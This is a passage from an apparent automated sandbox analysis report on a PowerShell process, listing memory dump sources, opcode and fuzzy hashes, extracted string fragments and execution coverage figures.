                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 537e2ab00b03c8dcf07be29e8dc55685bcc04983b67db14f5f72b76ccd53e4c0
                                                                          • Instruction ID: fa329a77c350ec1aacffe54253dab40c28e4d1b61d63726d70230b666e2aa585
                                                                          • Opcode Fuzzy Hash: 537e2ab00b03c8dcf07be29e8dc55685bcc04983b67db14f5f72b76ccd53e4c0
                                                                          • Instruction Fuzzy Hash: 4141F7B2B042199BCB145AB988012FFB7E1AFC8310F24856ADC16EB342EB31DD41C7D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2011140790.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4890000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8863a113dd87030e49043d42e1c1e544671db985234727432231b604ae2dca20
                                                                          • Instruction ID: d561fed08cab6da36d351e6e4ed17ee26cc8593b84a0868dca7cfeafcb54ae5c
                                                                          • Opcode Fuzzy Hash: 8863a113dd87030e49043d42e1c1e544671db985234727432231b604ae2dca20
                                                                          • Instruction Fuzzy Hash: BC416031B00604CFDB19DB74C4587AA7BF6EF89750F194969E406EB7A0DB35AC41CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2011140790.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4890000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aa29a0a9ca7cc03e070e8a5d1824371a172cb0985992de43eadee72cf54b5eba
                                                                          • Instruction ID: 14d38f7ecc7491060064d16403d33590be21e584714ddd07f35d60fa7f25f23a
                                                                          • Opcode Fuzzy Hash: aa29a0a9ca7cc03e070e8a5d1824371a172cb0985992de43eadee72cf54b5eba
                                                                          • Instruction Fuzzy Hash: CB417F70A00618CFDB18DFA9C8447ADBBF2BF88315F148969D006EB751DB70AC45CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2011140790.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4890000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fbbb390ba2f5aa20e5d1425592821bdaa6c4b1dddd09d0c015dc31c10da0656d
                                                                          • Instruction ID: dbf12acd66b82b12a483624b197414dd5fe4c131db4ad2bdd0ede7e9934d4b06
                                                                          • Opcode Fuzzy Hash: fbbb390ba2f5aa20e5d1425592821bdaa6c4b1dddd09d0c015dc31c10da0656d
                                                                          • Instruction Fuzzy Hash: 7D51B674A00219AFDF05CF98D884A9DBBF2FF88314F288559E405AB365C775AD82DF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2011140790.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4890000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: eae2ff87176ebdcd515d3202d04daecb91514bf59aea2ff77ef11917a38490e1
                                                                          • Instruction ID: 4e10795db3924b50f909882497a7140fd7fa879b816c5d0d92e07e942ac812d2
                                                                          • Opcode Fuzzy Hash: eae2ff87176ebdcd515d3202d04daecb91514bf59aea2ff77ef11917a38490e1
                                                                          • Instruction Fuzzy Hash: 22414B74A005099FCB16CF58C4949AEFBF1FF48324B198A99D816AB365C736FC51CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8fa6eda902c0216777270d158ab40059ba4369b3cce6413bdb5447250cc1db12
                                                                          • Instruction ID: 1da3b761d70e76b84cdf6fe67e7e1a3ea6c21f41016ff0f893a06e43bab40ebc
                                                                          • Opcode Fuzzy Hash: 8fa6eda902c0216777270d158ab40059ba4369b3cce6413bdb5447250cc1db12
                                                                          • Instruction Fuzzy Hash: 92213AB131421E9BDF245AAD8801BB7B6C69FC5715F34C82BD9068B386ED75D84183A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2011140790.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4890000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7e3af027bea705a07ecfc6037588f34c598458cfbb698792be1aebc397834ca3
                                                                          • Instruction ID: 087d98035bd715b477886fcc3234b54ddbe1ffed571faae9cc4ba5cc070a0780
                                                                          • Opcode Fuzzy Hash: 7e3af027bea705a07ecfc6037588f34c598458cfbb698792be1aebc397834ca3
                                                                          • Instruction Fuzzy Hash: 7831FA30A015288FCF26DB64C8557EEBBF2BF89305F1445E9D509AB251CB36AE85CF81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2011140790.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4890000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d364837c847df893691edb84beaa25fb1caddc8bcf8e27c74d464e5b94266ca7
                                                                          • Instruction ID: 46ca57972fef019d0b7220eed44cf60abcc22bfe206a52b1db18916fd6d3178a
                                                                          • Opcode Fuzzy Hash: d364837c847df893691edb84beaa25fb1caddc8bcf8e27c74d464e5b94266ca7
                                                                          • Instruction Fuzzy Hash: 87313A75A046459FCB15CF58C4809AAFBF1FF89310B298699E919EB762C731FC81CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c239788f471629c46e3e93e99b249aeb3a299af964eb9af40b96b9acc054bd59
                                                                          • Instruction ID: 72960a3488c34f4fe97d5e9e92e83f2cc967dab6996c0448ed7a26106587e2a1
                                                                          • Opcode Fuzzy Hash: c239788f471629c46e3e93e99b249aeb3a299af964eb9af40b96b9acc054bd59
                                                                          • Instruction Fuzzy Hash: 8C216BF17183495BDB240A794801BB76FD14FC6304F78852BEA468B3C3E979D840C361
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 14a42455ae6650e805049b4bda9e1943fa437f4454f4afc7c8b1160caca27512
                                                                          • Instruction ID: e790f2e0e090cb1aaed238a2f33e37085fc845cdd6564567040c99bb6bc6bf4f
                                                                          • Opcode Fuzzy Hash: 14a42455ae6650e805049b4bda9e1943fa437f4454f4afc7c8b1160caca27512
                                                                          • Instruction Fuzzy Hash: 9921DDF5A0421E9FCB149FB5C8402EABBE5EF88310B248567DC19EB341E7349D41CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 643bf0e97f159587f5262ec34a935afc8a4d7e090ceb644cab11d729179be530
                                                                          • Instruction ID: d05b47a74562f223c5d82b5fe84311b7614c29f7690bb998bc77c8e0895ddd92
                                                                          • Opcode Fuzzy Hash: 643bf0e97f159587f5262ec34a935afc8a4d7e090ceb644cab11d729179be530
                                                                          • Instruction Fuzzy Hash: 251136B27141118BCB119668EC026FEF7929BD1315F24C43BDA02CB782DF329822C794
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4cba8de6db9ebd2ad1c13bfd8aa224a1740713e72272dadb762bc7e9aba16f24
                                                                          • Instruction ID: 3a66339f1f778d8714db64417813f2ddf18c842efacceae902bf20074d28f498
                                                                          • Opcode Fuzzy Hash: 4cba8de6db9ebd2ad1c13bfd8aa224a1740713e72272dadb762bc7e9aba16f24
                                                                          • Instruction Fuzzy Hash: 91012F7630021A9BDB2459AAD4002FBB79A9FC1262F14843BE949CA742DA32C846C7A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2011140790.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4890000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 016ba262dccfdd30d7ed302b259f1590b472c88d4f5967e4a6598465257bd0a6
                                                                          • Instruction ID: fdfdf7a8525acffbada9873364d3f3cf7a6d294ac5c5f20ae04234f7d1ec416a
                                                                          • Opcode Fuzzy Hash: 016ba262dccfdd30d7ed302b259f1590b472c88d4f5967e4a6598465257bd0a6
                                                                          • Instruction Fuzzy Hash: D411E934A00209EFDF05CF98D884A9DBBF2FF88314F288558E405AB361C771AD82CB40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2010913175.0000000002C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C9D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2c9d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3d7e71c594dcaed32c50644d5b7c911eed8e523284c5da017ef9f082c12288ec
                                                                          • Instruction ID: 219cea8c87f7652c258bae82424a39be9f7378aec7ae89ed42462370daefd905
                                                                          • Opcode Fuzzy Hash: 3d7e71c594dcaed32c50644d5b7c911eed8e523284c5da017ef9f082c12288ec
                                                                          • Instruction Fuzzy Hash: 4B01F7710043449AEB106A16CCC8B67FFD8DF91325F08C559EC4A1B242C7799941C7F1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2010913175.0000000002C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C9D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2c9d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d7c96d9ccbe1dea53bbe740f983dba5414d9781f54e6dea593e05ee80e2a5c6d
                                                                          • Instruction ID: 02f613db43b2dd8c7b9676f136fc633cf1e3793fd7ee03c756c933349f76316f
                                                                          • Opcode Fuzzy Hash: d7c96d9ccbe1dea53bbe740f983dba5414d9781f54e6dea593e05ee80e2a5c6d
                                                                          • Instruction Fuzzy Hash: 53F0C272004344AEEB109E15CC88B63FF98EB81734F18C19AED491A286C7799980CAB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f078f5fd5ab7569ff1ca8ac85c225d3adaae87c2679821e82064c7e1fb82c518
                                                                          • Instruction ID: 5029b94e8689269d353b699cc487c45aebdc49ead7d7a0b901707ef9d38443bf
                                                                          • Opcode Fuzzy Hash: f078f5fd5ab7569ff1ca8ac85c225d3adaae87c2679821e82064c7e1fb82c518
                                                                          • Instruction Fuzzy Hash: 5EB012301051404FC202CB20C891400BB209F82104319C0CA94448B253CB23DD03C700
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2010913175.0000000002C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C9D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2c9d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f91439a38c45096b0d8142576bf9772275e680639f29cb02b36a919eabb9e280
                                                                          • Instruction ID: c4adad07d78b5382440000e954b6d34684e6cf56adec046ff5850cda7d96c950
                                                                          • Opcode Fuzzy Hash: f91439a38c45096b0d8142576bf9772275e680639f29cb02b36a919eabb9e280
                                                                          • Instruction Fuzzy Hash: 9E2124B16042449FDB04EF18D988B26BBA9EBD4724F24C66DD50B6B641C339D406C662
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'qq$4'qq$4'qq$4'qq$4'qq$4'qq$84bl$84bl$tPqq$tPqq$$qq$$qq$$qq$$qq$$qq$$qq$$qq
                                                                          • API String ID: 0-2218257937
                                                                          • Opcode ID: 7658aad7563d74d7e15b24606ffb29b18c37fc92399f8b763e10ec0dbab23e48
                                                                          • Instruction ID: 87202d45aacb5552d501a91a92893d6da90e9fa58f69da31cf62ca3d2912d2d9
                                                                          • Opcode Fuzzy Hash: 7658aad7563d74d7e15b24606ffb29b18c37fc92399f8b763e10ec0dbab23e48
                                                                          • Instruction Fuzzy Hash: 3202BFF1B1421ADFCB258E69C4446EBB7A2EF86311F24C46BDC498B356DB31D842CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 84bl$84bl$XRvq$XRvq$XRvq$tPqq$tPqq$$qq
                                                                          • API String ID: 0-333839873
                                                                          • Opcode ID: 6e1f1407579b5db0fcccc1ffa5c9efc9c6027c0a85440ab2ec6e970a6b06c648
                                                                          • Instruction ID: f1db3944f965281847ed625489c06223559d4f0e15116418b6d756da4f9cdadf
                                                                          • Opcode Fuzzy Hash: 6e1f1407579b5db0fcccc1ffa5c9efc9c6027c0a85440ab2ec6e970a6b06c648
                                                                          • Instruction Fuzzy Hash: 276106B1714216EFCB149B68C4416EAFBE2AF89311F64C46AEC059F352CB31DD46CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: tPqq$tPqq$$qq$$qq$$qq$$qq$Zl$Zl
                                                                          • API String ID: 0-3340406814
                                                                          • Opcode ID: a9d9912f1ca5ff31c5f0e6c8bd6c342c1cc844846f1471ec63a88e8fb9850f27
                                                                          • Instruction ID: 21d777ece1e4bdf887f86644454500275932b078c7a34e3aa504b30d44a59de8
                                                                          • Opcode Fuzzy Hash: a9d9912f1ca5ff31c5f0e6c8bd6c342c1cc844846f1471ec63a88e8fb9850f27
                                                                          • Instruction Fuzzy Hash: 11516CB17043169FDB264A69C805BBBBBA2AFC1311F18C47BDD558B382CB35D845C791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'qq$4'qq$84bl$84bl$tPqq$tPqq$$qq
                                                                          • API String ID: 0-2629238595
                                                                          • Opcode ID: 598329049f6bce82e0e7386f9027f2fd286ff6331841466cce892157d3c7ebae
                                                                          • Instruction ID: 45f6f5c23dfeb38b917c9c8baeeb60704250682e21d008fae593ddbdac1666dd
                                                                          • Opcode Fuzzy Hash: 598329049f6bce82e0e7386f9027f2fd286ff6331841466cce892157d3c7ebae
                                                                          • Instruction Fuzzy Hash: AA61E8B171422A9FDF158E64C4046FBBBA2AF89301F548867ED055F382DB31DE51C7A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $qq$$qq$$qq$$qq$$qq$$qq
                                                                          • API String ID: 0-1822695862
                                                                          • Opcode ID: 51e3313e7a01685bf02a244cd5879acf2403cd3caa093476863bd61a3c8ea211
                                                                          • Instruction ID: 429864e2a5b1aac3e779b73008698c64b6ccc10f473874bd3fc37606b39f397a
                                                                          • Opcode Fuzzy Hash: 51e3313e7a01685bf02a244cd5879acf2403cd3caa093476863bd61a3c8ea211
                                                                          • Instruction Fuzzy Hash: D43101F3708203CBDB254A6588516F7FBA1EBC6211B24C57BCC568B243DE35C846D352
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $ak$,Sdl$,Sdl$p5Tk$xSdl
                                                                          • API String ID: 0-548817480
                                                                          • Opcode ID: 4e50edd118f15d5319c31fd28e537aa4677d8ed20637ec09d80632689fb15220
                                                                          • Instruction ID: 3811100da103ef0ec7f20d9140b646b7b4803f15bd910617c83d9e0efb0e1976
                                                                          • Opcode Fuzzy Hash: 4e50edd118f15d5319c31fd28e537aa4677d8ed20637ec09d80632689fb15220
                                                                          • Instruction Fuzzy Hash: C94128B1A043159FCB129A6C88067E7BFE69F86321F14C57BD909DB342DA71D841C7A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (oqq$(oqq$(oqq$(oqq
                                                                          • API String ID: 0-3701351494
                                                                          • Opcode ID: 549fb454e6e8b119eb1134d1636fd5012c63f1a951c8f146b777626cb09a2fd9
                                                                          • Instruction ID: 5b34b751da28d24cf5fb7983d388583fe0284f3695ae2616d208aab4ac183a09
                                                                          • Opcode Fuzzy Hash: 549fb454e6e8b119eb1134d1636fd5012c63f1a951c8f146b777626cb09a2fd9
                                                                          • Instruction Fuzzy Hash: 2CF1DEB1704316DFDB158F68C845BABBBA2EB85311F18C46BE9058B392DB71D841CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'qq$4'qq$x.Uk$-Uk
                                                                          • API String ID: 0-2976610322
                                                                          • Opcode ID: 99fd0d2b963cf1374b2d25fd6a87cb8a2d70888a8d4e64a0793e43bcdff909f4
                                                                          • Instruction ID: 489a5a5a1255a9d4da7566f7fd5257e777828243e39e8bd230d09d4e2ace411c
                                                                          • Opcode Fuzzy Hash: 99fd0d2b963cf1374b2d25fd6a87cb8a2d70888a8d4e64a0793e43bcdff909f4
                                                                          • Instruction Fuzzy Hash: BFF16DB0A00215DFDB54CB64C845BEABBB2EF89305F50C0A5D9096F391CB76AD86CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 84bl$84bl$tPqq$tPqq
                                                                          • API String ID: 0-4260437278
                                                                          • Opcode ID: 09b308c641696b084b2fd21fde20ddc955d0349ff57658f175a11067a82a1039
                                                                          • Instruction ID: 281ccb7a987a0f5c55fd80e37e8027199eb9180065ea14240146919401ac7661
                                                                          • Opcode Fuzzy Hash: 09b308c641696b084b2fd21fde20ddc955d0349ff57658f175a11067a82a1039
                                                                          • Instruction Fuzzy Hash: 5D9147F1B042469BCB189E6988416FBBBE6AFC6354F24C46BDC459F382DB31D841C7A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (fdl$(fdl$(fdl$(fdl
                                                                          • API String ID: 0-2428511248
                                                                          • Opcode ID: 72eb56d5a8a99aa9349d28f77a84c79fd55053fbc604f4952c249301553029f4
                                                                          • Instruction ID: 3adc8985615f31d7a3fb979dcc700692c0afd6820e15973c3b95604e22021f97
                                                                          • Opcode Fuzzy Hash: 72eb56d5a8a99aa9349d28f77a84c79fd55053fbc604f4952c249301553029f4
                                                                          • Instruction Fuzzy Hash: 9E716BB0A102059BDB14CF58C455AFAFBF3AF88315F14C46AD815AB356CB32E852CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'qq$4'qq$$qq$$qq
                                                                          • API String ID: 0-2004584679
                                                                          • Opcode ID: cb12e7e1ecc116749cbe39de975676515c1994aef7e507afd111d2f314af31db
                                                                          • Instruction ID: 0718fda8d1c9ecc006998266fa2a9e64a736907bd163334cdbe0ec175c27a61a
                                                                          • Opcode Fuzzy Hash: cb12e7e1ecc116749cbe39de975676515c1994aef7e507afd111d2f314af31db
                                                                          • Instruction Fuzzy Hash: FF31E2B6714119DBCF258E14C4106EA77A2BF85321F20C837DD168F346CB31D949C792
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $qq$$qq$$qq$$qq
                                                                          • API String ID: 0-3704488771
                                                                          • Opcode ID: 18c0450e0924cceb64d655747c3fa43779cf63e8fba51ad26f662c9b1e910f4a
                                                                          • Instruction ID: d0903a2b958566c38c3f42850faa20c07c773295e4cac1dac3bc637db998b610
                                                                          • Opcode Fuzzy Hash: 18c0450e0924cceb64d655747c3fa43779cf63e8fba51ad26f662c9b1e910f4a
                                                                          • Instruction Fuzzy Hash: 512155B1314306EBEB28592A88117B7B796AFC0711F24842BED098B386DE79E841C361
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'qq$4'qq$$qq$$qq
                                                                          • API String ID: 0-2004584679
                                                                          • Opcode ID: d2d5f126ff5c997dfe09a893ef4ff8b24d523a66b8b05351e6ee197371a979bb
                                                                          • Instruction ID: 59859088e3bf646a010514db4391e8122326d77c3e80be59f0f00f1331983e34
                                                                          • Opcode Fuzzy Hash: d2d5f126ff5c997dfe09a893ef4ff8b24d523a66b8b05351e6ee197371a979bb
                                                                          • Instruction Fuzzy Hash: 6601F7B171D3869FC726163848211A6BFB29FC370172980D7C844CB2A7CE258C458397
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage:11.1%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:221
                                                                          Total number of Limit Nodes:21
